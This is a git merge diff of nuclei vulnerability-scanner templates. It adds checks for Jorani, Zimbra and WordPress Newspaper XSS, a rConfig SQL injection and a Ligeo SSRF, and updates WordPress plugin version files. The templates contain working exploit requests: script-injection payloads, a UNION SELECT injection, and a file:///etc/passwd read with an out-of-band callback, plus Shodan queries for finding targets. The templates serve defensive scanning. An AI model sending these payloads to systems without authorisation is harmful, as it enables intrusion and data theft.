Merge pull request #1 from projectdiscovery/main

 rudderstack-write-key.yaml

.new-additions

@@ -1,13 +1,17 @@
 http/cnvd/2021/CNVD-2021-32799.yaml
 http/cves/2016/CVE-2016-10108.yaml
+http/cves/2018/CVE-2018-15917.yaml
+http/cves/2020/CVE-2020-10220.yaml
 http/cves/2020/CVE-2020-11798.yaml
+http/cves/2021/CVE-2021-46107.yaml
 http/cves/2022/CVE-2022-22897.yaml
 http/cves/2023/CVE-2023-20073.yaml
 http/cves/2023/CVE-2023-26469.yaml
 http/cves/2023/CVE-2023-27034.yaml
 http/cves/2023/CVE-2023-30150.yaml
 http/cves/2023/CVE-2023-32563.yaml
 http/cves/2023/CVE-2023-34124.yaml
+http/cves/2023/CVE-2023-34192.yaml
 http/cves/2023/CVE-2023-36844.yaml
 http/exposed-panels/aspcms-backend-panel.yaml
 http/exposed-panels/greenbone-panel.yaml

helpers/wordpress/plugins/all-in-one-seo-pack.txt

@@ -1 +1 @@
-4.4.4
+4.4.5.1

helpers/wordpress/plugins/better-wp-security.txt

@@ -1 +1 @@
-8.1.7
+8.1.8

helpers/wordpress/plugins/broken-link-checker.txt

@@ -1 +1 @@
-2.2.1
+2.2.2

helpers/wordpress/plugins/cookie-law-info.txt

@@ -1 +1 @@
-3.1.2
+3.1.3

helpers/wordpress/plugins/loco-translate.txt

@@ -1 +1 @@
-2.6.4
+2.6.5

helpers/wordpress/plugins/maintenance.txt

@@ -1 +1 @@
-4.07
+4.08

helpers/wordpress/plugins/ml-slider.txt

@@ -1 +1 @@
-3.36.0
+3.37.0

helpers/wordpress/plugins/woocommerce-payments.txt

@@ -1 +1 @@
-6.3.2
+6.4.0

http/cves/2018/CVE-2018-15917.yaml

@@ -0,0 +1,50 @@
+id: CVE-2018-15917
+
+info:
+  name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.
+  reference:
+    - https://www.exploit-db.com/exploits/45338
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-15917
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2018-15917
+    cwe-id: CWE-79
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: title:"Login - Jorani"
+  tags: cve,cve2018,jorani,xss
+
+http:
+  - raw:
+      - |
+        GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /session/login HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>'
+          - '_jorani'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

http/cves/2020/CVE-2020-10220.yaml

@@ -0,0 +1,41 @@
+id: CVE-2020-10220
+
+info:
+  name: rConfig 3.9 - SQL injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
+  reference:
+    - http://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-10220
+  classification:
+    cve-id: CVE-2020-10220
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-89
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"rConfig"
+  tags: cve,cve2020,rconfig,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - raw:
+      - |
+        GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200

http/cves/2020/CVE-2020-13379.yaml

@@ -18,21 +18,23 @@ info:
     cvss-score: 8.2
     cve-id: CVE-2020-13379
     cwe-id: CWE-918
-    epss-score: 0.16322
     cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+    epss-score: 0.16322
   metadata:
-    max-request: 1
+    max-request: 2
+    product: grafana
     shodan-query: title:"Grafana"
-    verified: true
     vendor: grafana
-    product: grafana
+    verified: true
   tags: cve,cve2020,grafana,ssrf
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
+      - "{{BaseURL}}/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word

http/cves/2021/CVE-2021-46107.yaml

@@ -0,0 +1,42 @@
+id: CVE-2021-46107
+
+info:
+  name: Ligeo Archives Ligeo Basics - Server Side Request Forgery
+  author: ritikchaddha
+  severity: high
+  description: |
+    Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.
+  reference:
+    - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-46107
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-46107
+    cwe-id: CWE-918
+  metadata:
+    fofa-query: title="Ligeo"
+    max-request: 3
+    shodan-query: title:"Ligeo"
+    verified: true
+  tags: cve,cve2021,ligeo,ssrf,lfr
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /archive/download?file=file:///etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')"
+          - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"

http/cves/2022/CVE-2022-2627.yaml

@@ -1,11 +1,12 @@
 id: CVE-2022-2627
 
 info:
-  name: WordPress Newspaper <12 - Cross-Site Scripting
-  author: ramondunker
+  name: WordPress Newspaper < 12 - Cross-Site Scripting
+  author: ramondunker,c4sper0
   severity: medium
   description: |
     WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
+  remediation: Fixed in version 12
   reference:
     - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea
     - https://nvd.nist.gov/vuln/detail/CVE-2022-2627
@@ -18,6 +19,8 @@ info:
     cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:*
   metadata:
     max-request: 1
+    verified: true
+    publicwww-query: "/wp-content/themes/Newspaper"
     framework: wordpress
     vendor: tagdiv
     product: newspaper
@@ -26,19 +29,23 @@ info:
 http:
   - raw:
       - |
-        POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/2
+        POST /wp-admin/admin-ajax.php?td_theme_name=Newspaper&v=11.2 HTTP/1.1
         Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-        action=td_ajax_search&td_string=tej2j1q%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3emvufr
+        action=td_ajax_loop&loopState[moduleId]={{xss_payload}}&loopState[server_reply_html_data]=
+
+    payloads:
+      xss_payload:
+        - "<form><math><img+onerror=alert(document.domain)+src=1><mtext></form>"
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '<img src=x onerror=alert(document.domain)>'
-          - '/newspaper'
-        case-insensitive: true
+          - <form><math><img onerror=alert(document.domain) src=1><mtext>
+          - td-block-
         condition: and
 
       - type: word

http/cves/2023/CVE-2023-34192.yaml

@@ -0,0 +1,52 @@
+id: CVE-2023-34192
+
+info:
+  name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: high
+  description: |
+    Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.
+  reference:
+    - https://mp.weixin.qq.com/s/Vz8yL4xBlZN5EQQ_BG0OOA
+    - https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-34192
+  classification:
+    cve-id: CVE-2023-34192
+  metadata:
+    fofa-query: icon_hash="475145467"
+    max-request: 2
+    shodan-query: http.favicon.hash:475145467
+  tags: cve,cve2023,zimbra,xss,authenticated
+
+http:
+  - raw:
+      - |
+        POST /zimbra/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        loginOp=login&username={{username}}&password={{password}}&client=preferred
+
+      - |
+        GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "<script>alert(document.domain)</script>"
+          - "zimbra"
+        condition: and
+
+      - type: word
+        part: header_2
+        words:
+          - text/html
+
+      - type: status
+        part: header_2
+        status:
+          - 200

http/miscellaneous/apple-app-site-association.yaml

@@ -34,3 +34,8 @@ http:
       - type: status
         status:
           - 200
+
+    extractors:
+      - type: json
+        json:
+          - .applinks.details[].appID

http/vulnerabilities/other/rconfig-file-upload.yaml

@@ -1,20 +1,23 @@
-id: rconfig-rce
+id: rconfig-file-upload
 
 info:
   name: rConfig 3.9.5 - Arbitrary File Upload
   author: dwisiswant0
   severity: high
-  description: rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  description: |
+    rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  reference:
+    - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
+    - https://www.exploit-db.com/exploits/48878
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cwe-id: CWE-434
-  reference:
-    - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
-    - https://www.exploit-db.com/exploits/48878
-  tags: rconfig,rce,edb
   metadata:
     max-request: 1
+    shodan-query: title:"rConfig"
+    verified: true
+  tags: rconfig,rce,edb,file-upload,instrusive
 
 http:
   - raw: